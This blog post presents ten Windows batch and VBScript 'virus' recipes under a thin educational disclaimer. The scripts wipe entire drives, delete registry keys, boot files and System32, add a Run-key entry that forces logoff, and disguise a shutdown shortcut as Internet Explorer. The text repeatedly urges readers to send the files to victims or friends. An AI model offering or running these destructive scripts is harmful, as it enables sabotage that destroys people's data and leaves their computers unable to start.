Top 10 Virus Commands in Notepad

Disclaimer: This post is only for educational and security purposes don’t try any illegal activity I’m just sharing these methods so you can protect yourself against these attacks.

The notepad method of creating viruses is a technique used by hackers to create viruses and malware. It is one of the oldest methods of virus creation and is it still being used today. This method involves running windows simple destructive commands to add a line that executes the command with any desired command line parameters.

METHOD I:

  1. Just open your notepad
  2. Click start > All programs > Accessories > Notepad
    or just press or click Windows key + R, Run window will open and type Notepad and hit enter.

Now type the following code in the notepad:

@echo off
del D:*.* /f /s /q
del E:*.* /f /s /q
del F:*.* /f /s /q
del G:*.* /f /s /q
del H:*.* /f /s /q
del I:*.* /f /s /q
del J:*.* /f /s /q

Then save it as “queen.bat” and the batch file is created.
WARNING : This is the most dangerous virus! Be careful with its use. Do not run it!

Delete the entire registry

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*

Now save it as “queen.bat” and the batch file is created.

METHOD II:

Beware: How to crash a PC Forever!

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Open up Notepad and copy and paste the above code. Save it as a king.bat file.
This should shut down the victim’s computer. It shuts it off once and deletes the files needed to reboot and restart.

REMEMBER: DO NOT CLICK THIS FILE.

METHOD III:

How to stop someone’s internet access.

@Echo off
ipconfig /release

Save that as a “stopinternet.bat” and send it to someone. Their IP address will be lost, and therefore they won’t be able to fix it

Note: the fix is super easy. Simply type in IPconfig /renew

METHOD IV:

Shutdown PC a million Times.

  1. Right-click on the Desktop
  2. Click New > Shortcut
    you will get a dialogue box, write in it: shutdown -s -t 1000 c or any command u want then press Next. note: this “1000” I wrote is the time in seconds needed for your computer to shut down, you can put any number you want…
  3. You will get another dialogue box, write in it: Internet Explorer and click Finish.
  4. You will find the icon on your desktop, Do Not Open It!, just right-click on it and select Properties > Change icon > Select the icon of Internet Explorer and then simply click Apply then Ok.

Note: the only way to stop your computer from shutting down is to go to Start > Run > Type: shutdown -a

Method V:

Open Notepad
Type the following command:

del c:\WINDOWS\system32*.*/q

and save as “anything.bat”

Note: If your victim runs this file their SYSTEM32 Folder will be deleted, without it, a Windows PC can not be started.

Method VI:

Process:
Open Notepad
Copy the below command there

rd/s/q D:\
rd/s/q C:\
rd/s/q E:\

Save as “anything.bat”
Note: This virus Formats the C ,D , and E Drive in 3 Seconds.

Method VII:

Open the Notepad and type the following Code:

set ws=createobject(“wscript.shell”)
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell=”wscript.shell”
strDir=”C:\WINDOWS”
strfile=”\wscript.vbs”
st=Chr(34)
strlog=”shutdown -l”
strtxt2=”ws.run(strlog)”
set obfso=CreateObject(“Scripting.FileSystemObject”)
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline(“set ws=createobject(“&st&strshell&st&”)”)
obfile.writeline(“ws.run(“&st&strlog&st&”)”)
ws.regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff”,”C:\WINDOWS\wscript.vbs”,”REG_SZ”

Now Save This Notepad file With Any Name Having .vbs Extension.

Note: This code will always LOGOUT the computer.

Method VIII:

Open Notepad and write “start” without quotes
Start
Start
Start
and then save it with anyname.bat extension.
Now double-click on this .bat file to run Command Prompt.

Method IX:

Convey your friend a little message and shut down his / her computer:
@echo off
msg * I don’t like you
shutdown -c “Error! You are too stupid!” -s

Save it as “Anything.BAT” in All Files and send it.

Method 10 :

Toggle your friend’s Caps Lock button simultaneously:

Code:
Set wshShell =wscript.CreateObject(“WScript.Shel
l”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

Save it as “Anystuff.VBS” and use it wisely.

Leave a Reply

Your email address will not be published. Required fields are marked *